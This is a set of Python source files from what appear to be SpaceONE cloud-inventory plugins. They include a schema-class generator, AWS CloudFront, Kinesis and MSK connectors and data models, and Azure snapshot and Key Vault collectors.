result = '\n'.join(result)
return result, models
list_model_re = re.compile(r"'\w+'\s?:\s?\[\n\s*\{\s*(?:\n\s*.*)+?\s*\n\s*\},\s*\n\s*?\]")
list_model_parse_re = re.compile(r"""'(\w+)'\s?:\s?\[\n\s*(\{\s*(?:\n\s*.*)+\s*\n\s*\}),\s*\n\s*?\]""")
def normalize(class_name, text, _models: list = None):
models = _models or []
result, __models = find_model(text)
models += __models
pre_models = []
for m_text in list_model_re.findall(result):
origin = m_text
match = list_model_parse_re.match(m_text)
field = match.group(1)
_klass_name = class_name + field
snake_field = make_snake_name(field)
_klass, __models = normalize(_klass_name, match.group(2))
pre_models.append(_klass)
models += __models
result = result.replace(origin,
f"""'{field}':'{snake_field} = ListType(ModelType({_klass_name},deserialize_from="{field}"))'""")
pre_models = '\n\n'.join(pre_models)
result = boolean_re.sub(partial(make_simple_type, 'BooleanType'), result)
result = float_re.sub(partial(make_simple_type, 'FloatType'), result)
result = int_re.sub(partial(make_simple_type, 'IntType'), result)
result = string_re.sub(partial(make_simple_type, 'StringType'), result)
result = choice_string_re.sub(make_choice_string_type, result)
result = datetime_re.sub(partial(make_simple_type, 'DateTimeType'), result)
    result = list_float_re.sub(partial(make_list_type, 'FloatType'), result)
    result = list_int_re.sub(partial(make_list_type, 'IntType'), result)
result = list_string_re.sub(partial(make_list_type, 'StringType'), result)
if result[-1] == ',':
result = result[:-1]
print(result)
parse: dict = eval(result.strip())
fields = '\n '.join([x for x in parse.values()])
klass = f"{pre_models}\n\nclass {class_name}(Model):\n {fields}"
return klass, models
def make_models(models: List[Model]):
result = ''
for model in models:
_klass, _models = normalize(model.class_name, model.raw)
result = f"{result}\n{make_models(_models)}\n{_klass}"
return result
sample_simple = '''
{
'ErrorCode': 123,
    'ResponsePagePath': 'string',
    'ResponseCode': 'string',
'ErrorCachingMinTTL': 123,
'Enabled': True|False,
'Forward': 'none'|'whitelist'|'all',
'AAtACXDest': True|False
}'''
sample_list = '''
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123,
'Enabled': True|False,
'Forward': 'none'|'whitelist'|'all',
'AAtACXDest': True|False,
'Items': [
'string',
],
'NumList': [
123,
],
}'''
sample_nest_model = '''
{
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
    'Arc': 'string',
}
'''
sample_list_model = '''
{
'Distribution': {
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'InProgressInvalidationBatches': 123,
}
}
'''
list_model_in_list_model = '''
{
'NodeGroups': [
{
'NodeGroupId': 'string',
'Status': 'string',
'PrimaryEndpoint': {
'Address': 'string',
'Port': 123
},
'ReaderEndpoint': {
'Address': 'string',
'Port': 123
},
'Slots': 'string',
'NodeGroupMembers': [
{
'CacheClusterId': 'string',
'CacheNodeId': 'string',
'ReadEndpoint': {
'Address': 'string',
'Port': 123
},
'PreferredAvailabilityZone': 'string',
'CurrentRole': 'string'
},
]
},
],
}
'''
first = '''
import logging
from schematics import Model
from schematics.types import ModelType, StringType, IntType, DateTimeType, serializable, ListType, BooleanType
from spaceone.inventory.libs.schema.resource import ReferenceModel
_LOGGER = logging.getLogger(__name__)
'''
last = '''
reference = ModelType(ReferenceModel, serialize_when_none=False)
@serializable
def reference(self):
return {
"resource_id": self.arn,
"external_link": f"https://console.aws.amazon.com/"
}'''
if __name__ == '__main__':
# klass, models = normalize('SampleData', sample_simple)
#
# print(klass)
#
# klass, models = normalize('ListData', sample_list)
# print(klass)
# print('origin')
# print(sample_nest_model)
# klass, models = normalize('ModelData', sample_nest_model)
# print('to class')
# print(f"{make_models(models)}\n\n{klass}")
# print('origin')
# print(sample_list_model)
# klass, models = normalize('ListModelData', sample_list_model)
# print('to class')
# print(f"{make_models(models)}\n\n{klass}")
# print('origin')
# print('NOT SUPPORT LIST>Model>List> Model')
# print(list_model_in_list_model)
# klass, models = normalize('ListModelListModelData', list_model_in_list_model)
# print('to class')
# print(f"{make_models(models)}\n\n{klass}")
    data = '''{
'Path': 'string',
'UserName': 'string',
'UserId': 'string',
'Arn': 'string',
'CreateDate': datetime(2015, 1, 1),
'PasswordLastUsed': datetime(2015, 1, 1),
'PermissionsBoundary': {
'PermissionsBoundaryType': 'PermissionsBoundaryPolicy',
'PermissionsBoundaryArn': 'string'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},'''
print('origin')
print(data)
klass, models = normalize('User', data)
print('to class')
print(f"{first}{make_models(models)}{klass}{last}")
```
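Beyond the `__main__` demo, the two entry points above can be exercised directly; the snippet below is an illustrative run with invented input (expected output shown approximately in comments):
```python
# Illustrative usage of make_snake_name and normalize (values invented).
print(make_snake_name('StreamARN'))             # stream_arn
print(make_snake_name('RetentionPeriodHours'))  # retention_period_hours

snippet = '''
{
    'Enabled': True|False,
    'Quantity': 123,
}'''
klass, models = normalize('Sample', snippet)
print(klass)
# roughly:
# class Sample(Model):
#     enabled = BooleanType(deserialize_from="Enabled")
#     quantity = IntType(deserialize_from="Quantity")
```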
#### File: connector/aws_cloud_front_connector/connector.py
```python
import time
import logging
from typing import List
from spaceone.inventory.connector.aws_cloud_front_connector.schema.data import DistributionData, Tags
from spaceone.inventory.connector.aws_cloud_front_connector.schema.resource import CloudFrontResponse,\
DistributionResource
from spaceone.inventory.connector.aws_cloud_front_connector.schema.service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.libs.connector import SchematicAWSConnector
from spaceone.inventory.libs.schema.resource import ReferenceModel, CloudWatchModel
_LOGGER = logging.getLogger(__name__)
class CFConnector(SchematicAWSConnector):
response_schema = CloudFrontResponse
service_name = 'cloudfront'
def get_resources(self):
print("** Cloud Front START **")
resources = []
start_time = time.time()
for cst in CLOUD_SERVICE_TYPES:
resources.append(cst)
try:
for data in self.request_data():
# print(f"[ CloudFront DATA ]")
if getattr(data, 'set_cloudwatch', None):
data.cloudwatch = CloudWatchModel(data.set_cloudwatch())
resources.append(self.response_schema(
{'resource': DistributionResource({'data': data,
'reference': ReferenceModel(data.reference()),
'region_code': 'global'})}))
except Exception as e:
print(f'[ERROR {self.service_name}] {e}')
print(f' Cloud Front Finished {time.time() - start_time} Seconds')
return resources
def request_data(self) -> List[DistributionData]:
paginator = self.client.get_paginator('list_distributions')
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 10000,
'PageSize': 50,
}
)
for data in response_iterator:
for raw in data.get('DistributionList', {}).get('Items', []):
raw.update({
'state_display': self.get_state_display(raw.get('Enabled')),
'account_id': self.account_id,
'tags': list(self.list_tags_for_resource(raw.get('ARN')))
})
res = DistributionData(raw, strict=False)
yield res
def list_tags_for_resource(self, arn):
response = self.client.list_tags_for_resource(Resource=arn)
tags = response.get('Tags', {})
for _tag in tags.get('Items', []):
yield Tags(_tag, strict=False)
@staticmethod
def get_state_display(enabled):
if enabled:
return 'Enabled'
else:
return 'Disabled'
```
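The `request_data` generator above leans on boto3's standard paginator API; stripped of the schema layer, the same traversal looks like the sketch below (AWS credentials and region must already be configured in the environment):
```python
# Standalone sketch of the boto3 pagination pattern the connector relies on.
# Assumes AWS credentials/region are configured; output keys follow the
# CloudFront ListDistributions response shape.
import boto3

client = boto3.client('cloudfront')
paginator = client.get_paginator('list_distributions')

for page in paginator.paginate(PaginationConfig={'MaxItems': 10000, 'PageSize': 50}):
    for item in page.get('DistributionList', {}).get('Items', []):
        print(item['Id'], item.get('Status'))
```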
#### File: aws_kinesis_data_stream_connector/schema/data.py
```python
import logging
from schematics import Model
from schematics.types import (
ModelType,
StringType,
IntType,
DateTimeType,
ListType,
BooleanType,
)
_LOGGER = logging.getLogger(__name__)
# list_tags_for_stream
class Tags(Model):
key = StringType(deserialize_from="Key")
value = StringType(deserialize_from="Value")
has_more_tags = BooleanType(
deserialize_from="HasMoreTags", serialize_when_none=False
)
# list_stream_consumers
class Consumers(Model):
consumers_num = IntType()
consumer_name = StringType(deserialize_from="ConsumerName")
consumer_arn = StringType(deserialize_from="ConsumerARN")
consumer_status = StringType(
deserialize_from="ConsumerStatus", choices=("CREATING", "DELETING", "ACTIVE")
)
consumer_status_display = StringType(choices=("Creating", "Deleting", "Active"))
consumer_creation_timestamp = DateTimeType(
deserialize_from="ConsumerCreationTimestamp"
)
# describe_stream
class HashKeyRange(Model):
starting_hash_key = StringType(deserialize_from="StartingHashKey")
ending_hash_key = StringType(deserialize_from="EndingHashKey")
class SequenceNumberRange(Model):
starting_sequence_number = StringType(deserialize_from="StartingSequenceNumber")
ending_sequence_number = StringType(deserialize_from="EndingSequenceNumber")
class Shards(Model):
shard_id = StringType(deserialize_from="ShardId")
parent_shard_id = StringType(deserialize_from="ParentShardId")
adjacent_parent_shard_id = StringType(deserialize_from="AdjacentParentShardId")
hash_key_range = ModelType(HashKeyRange, deserialize_from="HashKeyRange")
sequence_number_range = ModelType(
SequenceNumberRange, deserialize_from="SequenceNumberRange"
)
class EnhancedMonitoring(Model):
shard_level_metrics = ListType(
StringType(
choices=(
"IncomingBytes",
"IncomingRecords",
"OutgoingBytes",
"OutgoingRecords",
"WriteProvisionedThroughputExceeded",
"ReadProvisionedThroughputExceeded",
"IteratorAgeMilliseconds",
"ALL",
)
),
deserialize_from="ShardLevelMetrics",
)
class ConsumersVO(Model):
num_of_consumers = IntType()
consumers = ListType(ModelType(Consumers), default=[])
class StreamDescription(Model):
stream_name = StringType(deserialize_from="StreamName")
stream_arn = StringType(deserialize_from="StreamARN")
stream_status = StringType(
deserialize_from="StreamStatus",
choices=("CREATING", "DELETING", "ACTIVE", "UPDATING"),
)
stream_status_display = StringType(
choices=("Creating", "Deleting", "Active", "Updating")
)
shards = ListType(ModelType(Shards), deserialize_from="Shards")
open_shards_num = IntType()
closed_shards_num = IntType()
has_more_shards = BooleanType(deserialize_from="HasMoreShards")
retention_period_hours = IntType(deserialize_from="RetentionPeriodHours")
retention_period_days = IntType()
retention_period_display = StringType()
retention_period_display_hours = StringType()
stream_creation_timestamp = DateTimeType(deserialize_from="StreamCreationTimestamp")
enhanced_monitoring = ListType(
ModelType(EnhancedMonitoring), deserialize_from="EnhancedMonitoring"
)
shard_level_metrics_display = ListType(StringType())
encryption_type = StringType(
deserialize_from="EncryptionType", choices=("NONE", "KMS")
)
encryption_display = StringType(choices=("Disabled", "Enabled"))
key_id = StringType(deserialize_from="KeyId")
consumers_vo = ModelType(ConsumersVO)
tags = ListType(ModelType(Tags), default=[])
def reference(self, region_code):
return {
"resource_id": self.stream_arn,
"external_link": f"https://console.aws.amazon.com/kinesis/home?region={region_code}#/streams/details/{self.stream_name}",
}
```
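A minimal usage sketch of the schema above, assuming the models are importable and schematics 2.x semantics: `deserialize_from` maps the boto3 field names onto the snake_case attributes, and `strict=False` ignores keys the model does not declare. The payload values are illustrative only.
```python
# Illustrative payload shaped like boto3 describe_stream()['StreamDescription'];
# names and values are made up for the example.
sample = {
    'StreamName': 'orders',
    'StreamARN': 'arn:aws:kinesis:us-east-1:123456789012:stream/orders',
    'StreamStatus': 'ACTIVE',
    'RetentionPeriodHours': 24,
    'EncryptionType': 'NONE',
}
stream = StreamDescription(sample, strict=False)  # strict=False skips undeclared keys
print(stream.stream_name)             # 'orders'
print(stream.reference('us-east-1'))  # resource_id plus a console deep link
```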
#### File: aws_msk_connector/schema/data.py
```python
import logging
from schematics import Model
from schematics.types import ModelType, StringType, IntType, FloatType, DateTimeType, ListType, BooleanType
from spaceone.inventory.libs.schema.resource import CloudWatchModel, CloudWatchDimensionModel
_LOGGER = logging.getLogger(__name__)
class Tags(Model):
key = StringType()
value = StringType()
class EbsStorageInfo(Model):
volume_size = IntType(deserialize_from="VolumeSize")
class StorageInfo(Model):
    ebs_storage_info = ModelType(EbsStorageInfo, deserialize_from="EbsStorageInfo")
class BrokerNodeGroupInfo(Model):
broker_az_distribution = StringType(deserialize_from="BrokerNodeGroupInfo", default="DEFAULT")
client_subnets = ListType(StringType, deserialize_from="ClientSubnets")
instance_type = StringType(deserialize_from="InstanceType")
security_group = ListType(StringType, deserialize_from="SecurityGroups")
    storage_info = ModelType(StorageInfo, deserialize_from="StorageInfo")
class Scram(Model):
enabled = BooleanType(deserialize_from="Enabled")
class Sasl(Model):
scram = ModelType(Scram, deserialize_from="Sasl")
class Tls(Model):
certificate_authority_arn_list = ListType(StringType, deserialize_from="CertificateAuthorityArnList")
class ClientAuthentication(Model):
sasl = ModelType(Sasl, deserialize_from="Sasl")
tls = ModelType(Tls, deserialize_from="Tls")
class CurrentBrokerSoftwareInfo(Model):
configuration_arn = StringType(deserialize_from="ConfigurationArn")
configuration_revision = IntType(deserialize_from="ConfigurationRevision")
kafka_version = StringType(deserialize_from="KafkaVersion")
class EncryptionInTransit(Model):
client_broker = StringType(deserialize_from="ClientBroker", choices=('TLS','TLS_PLAINTEXT','PLAINTEXT'))
in_cluster = BooleanType(deserialize_from="InCluster")
class EncryptionAtRest(Model):
data_volume_kms_key_id = StringType(deserialize_from="DataVolumeKMSKeyId")
class EncryptionInfo(Model):
encryption_at_rest = ModelType(EncryptionAtRest, deserialize_from="EncryptionAtRest")
encryption_in_transit = ModelType(EncryptionInTransit, deserialize_from="EncryptionInTransit")
class JmxExporter(Model):
enabled_in_broker = BooleanType(deserialize_from="EnabledInBroker")
class NodeExporter(Model):
enabled_in_broker = BooleanType(deserialize_from="EnabledInBroker")
class Prometheus(Model):
jmx_exporter = ModelType(JmxExporter, deserialize_from="EnabledInBroker")
node_exporter = ModelType(NodeExporter, deserialize_from="EnabledInBroker")
class OpenMonitoring(Model):
prometheus = ModelType(Prometheus, deserialize_from="Prometheus")
class CloudWatchLogs(Model):
enabled = BooleanType(deserialize_from="Enabled")
log_group = StringType(deserialize_from="LogGroup")
class BrokerLogs(Model):
cloud_watch_logs = ModelType(CloudWatchLogs, deserialize_from="CloudWatchLogs")
class Firehose(Model):
delivery_stream = StringType(deserialize_from="DeliveryStream")
enabled = BooleanType(deserialize_from="Enabled")
class S3(Model):
bucket = StringType(deserialize_from="Bucket")
enabled = BooleanType(deserialize_from="Enabled")
prefix = StringType(deserialize_from="Prefix")
class LoggingInfo(Model):
broker_logs = ModelType(BrokerLogs, deserialize_from="BrokerLogs")
firehose = ModelType(Firehose, deserialize_from="Firehose")
s3 = ModelType(S3, deserialize_from="S3")
class StateInfo(Model):
code = StringType(deserialize_from="Code")
message = StringType(deserialize_from="Message")
'''
LIST_CLUSTER_OPERATIONS()
'''
class MskCluster(Model):
active_operation_arn = StringType(deserialize_from="ActiveOperationArn")
broker_node_group_info = ModelType(BrokerNodeGroupInfo, deserialize_from="BrokerNodeGroupInfo")
client_authentication = ModelType(ClientAuthentication, deserialize_from="ClientAuthentication")
cluster_arn = StringType(deserialize_from='ClusterArn')
cluster_name = StringType(deserialize_from='ClusterName')
creation_time = DateTimeType(deserialize_from='CreationTime')
current_broker_software_info = ModelType(CurrentBrokerSoftwareInfo, deserialize_from='CurrentBrokerSoftwareInfo')
current_version = StringType(deserialize_from='CurrentVersion')
encryption_info = ModelType(EncryptionInfo, deserialize_from='EncryptionInfo')
enhanced_monitoring = StringType(deserialize_from='EnhancedMonitoring',
choices=('DEFAULT','PER_BROKER','PER_TOPIC_PER_BROKER','PER_TOPIC_PER_PARTITION'))
open_monitoring = ModelType(OpenMonitoring, deserialize_from='OpenMonitoring')
logging_info = ModelType(LoggingInfo, deserialize_from='LoggingInfo')
number_of_broker_nodes = IntType(deserialize_from='NumberOfBrokerNodes')
state = StringType(deserialize_from='State',
choices=('ACTIVE','CREATING','DELETING','FAILED',
'HEALING','MAINTENANCE','REBOOTING_BROKER','UPDATING'))
state_info = ModelType(StateInfo, deserialize_from='StateInfo')
tags = ListType(ModelType(Tags), deserialize_from='Tags', default=[])
zookeeper_connect_string = StringType(deserialize_from='ZookeeperConnectString')
zookeeper_connect_string_tls = StringType(deserialize_from='ZookeeperConnectStringTls')
class BrokerNodeInfo(Model):
attached_eni_id = StringType(deserialize_from='AttachedENIId')
broker_id = FloatType(deserialize_from='BrokerId')
client_subnet = StringType(deserialize_from='ClientSubnet')
client_vpc_ip_address = StringType(deserialize_from='ClientVpcIpAddress')
current_broker_software_info = ModelType(CurrentBrokerSoftwareInfo, deserialize_from='CurrentBrokerSoftwareInfo')
endpoints = ListType(StringType, deserialize_from='Endpoints')
class ZookeeperNodeInfo(Model):
attached_eni_id = StringType(deserialize_from='AttachedENIId')
client_vpc_ip_address = StringType(deserialize_from='ClientVpcIpAddress')
endpoints = ListType(StringType, deserialize_from='Endpoints')
zookeeper_id = FloatType(deserialize_from='ZookeeperId')
zookeeper_version = StringType(deserialize_from='ZookeeperVersion')
class NodeInfo(Model):
added_to_cluster_time = StringType(deserialize_from='AddedToClusterTime')
broker_node_info = ModelType(BrokerNodeInfo, deserialize_from='BrokerNodeInfo')
instance_type = StringType(deserialize_from='InstanceType')
node_arn = StringType(deserialize_from='NodeARN')
node_type = StringType(deserialize_from='NodeType')
zookeeper_node_info = ModelType(ZookeeperNodeInfo, deserialize_from='ZookeeperNodeInfo')
class ClusterInfoList(Model):
    cluster_info_list = ListType(ModelType(MskCluster), deserialize_from='ClusterInfoList', default=[])
class LatestRevision(Model):
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType(deserialize_from='Description')
revision = IntType(deserialize_from='Revision')
class Configurations(Model):
arn = StringType(deserialize_from='Arn')
creation_time = DateTimeType(deserialize_from='CreationTime')
    description = StringType(deserialize_from='Description')
kafka_versions = ListType(StringType, deserialize_from='KafkaVersions')
latest_revision = ModelType(LatestRevision, deserialize_from='LatestRevision')
name = StringType(deserialize_from='Name')
state = StringType(deserialize_from='State', choices=('ACTIVE','DELETING','DELETE_FAILED'))
class ListConfigurations(Model):
configurations = ListType(ModelType(Configurations), deserialize_from='Configurations', default=[])
class GetBootStrapBrokers(Model):
bootstrap_broker_string = StringType(deserialize_from='BootstrapBrokerString')
bootstrap_broker_tls = StringType(deserialize_from='BootstrapBrokerStringTls')
bootstrap_broker_string_sasl_scram = StringType(deserialize_from='BootstrapBrokerStringSaslScram')
class ListConfigurationRevisions(Model):
revisions = ListType(ModelType(LatestRevision), deserialize_from='Revisions')
class DescribeConfigurationRevision(Model):
arn = StringType(deserialize_from='Arn')
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType(deserialize_from='Description')
revision = IntType(deserialize_from='Revision')
server_properties = ListType(StringType, deserialize_from='ServerProperties')
class ErrorInfo(Model):
error_code = StringType(deserialize_from='ErrorCode')
error_string = StringType(deserialize_from='ErrorString')
class ClusterOperation(Model):
cluster_arn = StringType(deserialize_from='ClusterArn')
creation_time = DateTimeType(deserialize_from='CreationTime')
end_time = DateTimeType(deserialize_from='EndTime')
error_info = ModelType(ErrorInfo, deserialize_from='ErrorInfo')
operation_arn = StringType(deserialize_from='OperationArn')
operation_type = StringType(deserialize_from='OperationType')
class Cluster(Model):
active_operation_arn = StringType(deserialize_from="ActiveOperationArn", serialize_when_none=False)
broker_node_group_info = ModelType(BrokerNodeGroupInfo, deserialize_from="BrokerNodeGroupInfo")
client_authentication = ModelType(ClientAuthentication, deserialize_from="ClientAuthentication")
cluster_arn = StringType(deserialize_from='ClusterArn')
cluster_name = StringType(deserialize_from='ClusterName')
creation_time = DateTimeType(deserialize_from='CreationTime')
current_broker_software_info = ModelType(CurrentBrokerSoftwareInfo, deserialize_from='CurrentBrokerSoftwareInfo')
current_version = StringType(deserialize_from='CurrentVersion')
encryption_info = ModelType(EncryptionInfo, deserialize_from='EncryptionInfo')
enhanced_monitoring = StringType(deserialize_from='EnhancedMonitoring',
choices=(
'DEFAULT', 'PER_BROKER', 'PER_TOPIC_PER_BROKER', 'PER_TOPIC_PER_PARTITION'))
open_monitoring = ModelType(OpenMonitoring, deserialize_from='OpenMonitoring')
logging_info = ModelType(LoggingInfo, deserialize_from='LoggingInfo')
number_of_broker_nodes = IntType(deserialize_from='NumberOfBrokerNodes')
state = StringType(deserialize_from='State',
choices=('ACTIVE', 'CREATING', 'DELETING', 'FAILED',
'HEALING', 'MAINTENANCE', 'REBOOTING_BROKER', 'UPDATING'))
state_info = ModelType(StateInfo, deserialize_from='StateInfo')
tags = ListType(ModelType(Tags), deserialize_from='Tags', default=[])
zookeeper_connect_string = StringType(deserialize_from='ZookeeperConnectString')
zookeeper_connect_string_tls = StringType(deserialize_from='ZookeeperConnectStringTls')
    # Broker Node Information
node_info_list = ListType(ModelType(NodeInfo), default=[])
# Cluster Operation Info List
cluster_operation_info = ListType(ModelType(ClusterOperation), default=[])
def reference(self, region_code):
return {
"resource_id": self.cluster_arn,
"external_link": f"https://console.aws.amazon.com/msk/home?region={region_code}#/cluster/{self.cluster_arn}/view?tabId=details"
}
class Configuration(Model):
arn = StringType(deserialize_from='Arn')
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType(deserialize_from='Description')
kafka_versions = ListType(StringType, deserialize_from='KafkaVersions')
latest_revision = ModelType(LatestRevision, deserialize_from='LatestRevision')
name = StringType(deserialize_from='Name')
state = StringType(deserialize_from='State', choices=('ACTIVE', 'DELETING', 'DELETE_FAILED'))
revisions_configurations = ListType(ModelType(DescribeConfigurationRevision))
def reference(self, region_code):
return {
"resource_id": self.arn,
"external_link": f"https://console.aws.amazon.com/msk/home?region={region_code}#/configuration/{self.arn}/view"
}
```
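The `choices=(...)` constraints above are enforced when `validate()` is called, not at construction time. A small sketch, assuming schematics 2.x and the models above in scope:
```python
from schematics.exceptions import DataError

cluster = MskCluster({'ClusterName': 'demo', 'State': 'ACTIVE'}, strict=False)
cluster.validate()  # passes: 'ACTIVE' is one of the allowed State choices

bad = MskCluster({'State': 'NOT_A_STATE'}, strict=False)
try:
    bad.validate()
except DataError as err:  # reports the offending field and value
    print(err)
```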
#### File: connector/aws_workspace_connector/connector.py
```python
import logging
from typing import List
from spaceone.inventory.connector.aws_cloud_front_connector.schema.data import DistributionData
from spaceone.inventory.connector.aws_cloud_front_connector.schema.resource import CloudFrontResponse, DistributionResource
from spaceone.inventory.connector.aws_cloud_front_connector.schema.service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.libs.connector import SchematicAWSConnector
from spaceone.inventory.libs.schema.resource import ReferenceModel
_LOGGER = logging.getLogger(__name__)
class CFConnector(SchematicAWSConnector):
response_schema = CloudFrontResponse
service_name = 'cloudfront'
def get_resources(self) -> List[DistributionResource]:
resources = []
# init cloud service type
for cst in CLOUD_SERVICE_TYPES:
resources.append(cst)
# merge data
for data in self.request_data():
resources.append(self.response_schema(
{'resource': DistributionResource({'data': data,
'reference': ReferenceModel(data.reference)})}))
return resources
def request_data(self) -> List[DistributionData]:
paginator = self.client.get_paginator('list_distributions')
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 10000,
'PageSize': 50,
}
)
for data in response_iterator:
for raw in data.get('DistributionList', {}).get('Items', []):
res = DistributionData(raw, strict=False)
yield res
```
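The `request_data` generator above leans on boto3's paginator; here is the same pattern in isolation, assuming AWS credentials and a region are configured in the environment:
```python
import boto3

def iter_distributions(page_size=50, max_items=10000):
    client = boto3.client('cloudfront')
    paginator = client.get_paginator('list_distributions')
    pages = paginator.paginate(
        PaginationConfig={'MaxItems': max_items, 'PageSize': page_size}
    )
    for page in pages:
        # 'Items' is absent when the account has no distributions
        for item in page.get('DistributionList', {}).get('Items', []):
            yield item

for dist in iter_distributions():
    print(dist['Id'], dist['DomainName'])
```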
#### File: inventory/libs/manager.py
```python
from spaceone.core.manager import BaseManager
class AWSManager(BaseManager):
connector_name = None
def verify(self, options, secret_data, **kwargs):
""" Check collector's status.
"""
connector = self.locator.get_connector(self.connector_name, secret_data=secret_data)
connector.verify()
def collect_resources(self, **kwargs) -> list:
return self.locator.get_connector(self.connector_name, **kwargs).collect_data()
```
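A sketch of how a service-specific manager would plug into this base class; the connector name string is an assumption and must match whatever the project's locator has registered:
```python
# Hypothetical subclass; 'CloudFrontConnector' is illustrative only.
class CloudFrontManager(AWSManager):
    connector_name = 'CloudFrontConnector'

# mgr.verify(options={}, secret_data=secret)   # delegates to connector.verify()
# mgr.collect_resources(secret_data=secret)    # delegates to connector.collect_data()
```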
|
{
"source": "jean1042/plugin-azure-cloud-services",
"score": 2
}
|
#### File: inventory/connector/snapshot.py
```python
import logging
from spaceone.inventory.libs.connector import AzureConnector
from spaceone.inventory.error import *
from spaceone.inventory.error.custom import *
__all__ = ['SnapshotConnector']
_LOGGER = logging.getLogger(__name__)
class SnapshotConnector(AzureConnector):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.set_connect(kwargs.get('secret_data'))
def list_snapshots(self):
try:
return self.compute_client.snapshots.list()
except ConnectionError:
            _LOGGER.error(ERROR_CONNECTOR(field='Snapshot'))
```
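A standalone sketch of what `set_connect()` and `compute_client` presumably wrap, using the azure-mgmt-compute SDK directly; the subscription id is a placeholder and credentials are resolved from the environment:
```python
from azure.identity import DefaultAzureCredential
from azure.mgmt.compute import ComputeManagementClient

credential = DefaultAzureCredential()
client = ComputeManagementClient(credential, subscription_id='<subscription-id>')
for snapshot in client.snapshots.list():  # same call the connector makes
    print(snapshot.name, snapshot.location)
```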
#### File: inventory/manager/key_vault_manager.py
```python
from spaceone.inventory.libs.manager import AzureManager
from spaceone.inventory.libs.schema.base import ReferenceModel
from spaceone.inventory.connector.key_vault import KeyVaultConnector
from spaceone.inventory.model.keyvault.cloud_service import *
from spaceone.inventory.model.keyvault.cloud_service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.model.keyvault.data import *
from spaceone.inventory.error.custom import *
import time
import logging
_LOGGER = logging.getLogger(__name__)
class KeyVaultManager(AzureManager):
connector_name = 'KeyVaultConnector'
cloud_service_types = CLOUD_SERVICE_TYPES
def collect_cloud_service(self, params):
"""
Args:
params (dict):
- 'options' : 'dict'
- 'schema' : 'str'
- 'secret_data' : 'dict'
- 'filter' : 'dict'
- 'zones' : 'list'
- 'subscription_info' : 'dict'
Response:
CloudServiceResponse (dict) : dictionary of azure key vault data resource information
"""
_LOGGER.debug(f'** Key Vault START **')
start_time = time.time()
subscription_info = params['subscription_info']
key_vault_conn: KeyVaultConnector = self.locator.get_connector(self.connector_name, **params)
key_vaults = []
key_vaults_obj_list = key_vault_conn.list_all_key_vaults()
for key_vault in key_vaults_obj_list:
key_vault_dict = self.convert_nested_dictionary(self, key_vault)
key_vault_dict.update({
'resource_group': self.get_resource_group_from_id(key_vault_dict['id']), # parse resource_group from ID
'subscription_id': subscription_info['subscription_id'],
'subscription_name': subscription_info['subscription_name'],
})
resource_group_name = key_vault_dict.get('resource_group', '')
subscription_id = key_vault_dict.get('subscription_id', '')
# Get list of keys, secrets
if key_vault_dict.get('properties', {}).get('vault_uri') is not None:
vault_name = key_vault_dict['name']
vault_uri = key_vault_dict['properties']['vault_uri']
try:
key_vault_dict.update({
'keys': self.list_keys(self, key_vault_conn, resource_group_name, vault_name),
'secrets': self.list_secrets(self, key_vault_conn, subscription_id, vault_uri),
'certificates': self.list_certificates(self, key_vault_conn, subscription_id, vault_uri)
})
except PermissionError:
_LOGGER.error(ERROR_KEY_VAULTS_PERMISSION(field='Key Vaults'))
# Get name of private connection from ID
if key_vault_dict.get('properties', {}).get('private_endpoint_connections') is not None:
key_vault_dict['properties'].update({
'private_endpoint_connections': self.get_private_endpoint_name(key_vault_dict['properties']['private_endpoint_connections'])
})
# Change purge protection to user-friendly word
if key_vault_dict.get('properties', {}).get('enable_purge_protection') is not None:
key_vault_dict['properties'].update({
'enable_purge_protection_str': 'Disabled' if key_vault_dict['properties']['enable_purge_protection'] is False else 'Enabled'
})
_LOGGER.debug(f'[KEY VAULT INFO] {key_vault_dict}')
key_vault_data = KeyVault(key_vault_dict, strict=False)
key_vault_resource = KeyVaultResource({
'data': key_vault_data,
'region_code': key_vault_data.location,
'reference': ReferenceModel(key_vault_data.reference()),
'name': key_vault_data.name
})
# Must set_region_code method for region collection
self.set_region_code(key_vault_data['location'])
key_vaults.append(KeyVaultResponse({'resource': key_vault_resource}))
_LOGGER.debug(f'** Key Vault Finished {time.time() - start_time} Seconds **')
return key_vaults
@staticmethod
def list_keys(self, key_vault_conn, resource_group_name, vault_name):
try:
keys = []
keys_obj_list = key_vault_conn.list_keys(resource_group_name=resource_group_name, vault_name=vault_name)
if keys_obj_list:
for key in keys_obj_list:
key_dict = self.convert_nested_dictionary(self, key)
keys.append(key_dict)
return keys
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Key Vaults'))
@staticmethod
def list_secrets(self, key_vault_conn, subscription_id, vault_uri):
try:
key_vault_secret_client = key_vault_conn.init_key_vault_secret_client(subscription_id=subscription_id, vault_uri=vault_uri)
secrets = []
secrets_obj_list = key_vault_secret_client.list_properties_of_secrets()
if secrets_obj_list:
for secret in secrets_obj_list:
secret_dict = self.convert_nested_dictionary(self, secret)
secrets.append(secret_dict)
return secrets
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Key Vaults'))
@staticmethod
def list_certificates(self, key_vault_conn, subscription_id, vault_uri):
try:
key_vault_certificate_client = key_vault_conn.init_key_vault_certificate_client(subscription_id=subscription_id, vault_uri=vault_uri)
certificates = []
certificate_obj_list = key_vault_certificate_client.list_properties_of_certificates()
if certificate_obj_list:
for certificate in certificate_obj_list:
                    certificate_dict = self.convert_nested_dictionary(self, certificate)
                    certificates.append(certificate_dict)
return certificates
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Key Vaults'))
@staticmethod
def get_private_endpoint_name(private_endpoint_connections):
try:
for private_endpoint in private_endpoint_connections:
private_endpoint.update({
'name': private_endpoint['id'].split('/')[10]
})
return private_endpoint_connections
except ValueError:
